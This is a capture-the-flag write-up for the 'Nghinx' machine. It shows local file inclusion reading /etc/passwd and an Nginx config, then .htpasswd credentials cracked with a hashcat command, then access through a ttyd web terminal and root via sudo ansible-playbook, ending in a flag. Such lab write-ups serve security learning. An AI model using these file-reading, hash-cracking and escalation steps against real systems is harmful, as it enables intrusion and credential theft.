This machine CTF demonstrates how LFI and misconfiguration in the default Nginx config can lead to machine or even account takeover.
Challenge Details
- Challenge Name: Nghinx
- Challenge Type: Machine
- Difficulty: Medium
- Points: 100
- Description:
“We never been hacked, we probably have the most secure app so far.”
Initial Enumeration
When accessing the machine URL, we’re greeted with a blog homepage:
Clicking on “My first blog” redirects us to a .txt file, which throws an error:
Let’s try removing the path from the redirection and access /etc/passwd:
We get a readable response. Attempting /etc/shadow fails due to permission issues:
Nginx Configuration Enumeration
Given the challenge name, we suspect this is running Nginx. Trying to access /etc/nginx/nginx.conf doesn’t help:
However, reading /etc/nginx/sites-available/default gives us valuable information:
Nginx Configuration Snippet
server { listen 80; location ~ ^/ttydremote(.*)$ { proxy_pass http://127.0.0.1:7681/$1; auth_basic "Restricted Access"; auth_basic_user_file /etc/nginx/.htpasswd; } ...}This tells us /ttydremote is protected by basic auth using /etc/nginx/.htpasswd.
Cracking Credentials
We read the .htpasswd file and extract the hashed credentials:
Use Hashcat to crack the hash:
sudo hashcat -m 1600 hash.txt /home/Ignite/Desktop/Tool/rockyou.txtAnd we get:
- Username:
username - Password:
password
Gaining Access
Accessing /ttydremote prompts for credentials. We use the cracked ones:
Now we’re inside the system as a low-privileged user.
Privilege Escalation
Running sudo -l reveals we can execute ansible-playbook with sudo:
Check GTFOBins for escalation steps:
Execute the suggested commands, gain a root shell, and grab the flag.
Final Flag
We navigate to /root and retrieve the flag:
Flag{QCFAb2I1MlNaY1lld2dyUElDMVNIeU5sZz09ZjU0MjhiMmZlN2MwZmViOA==}
We are done great job everyone! 👏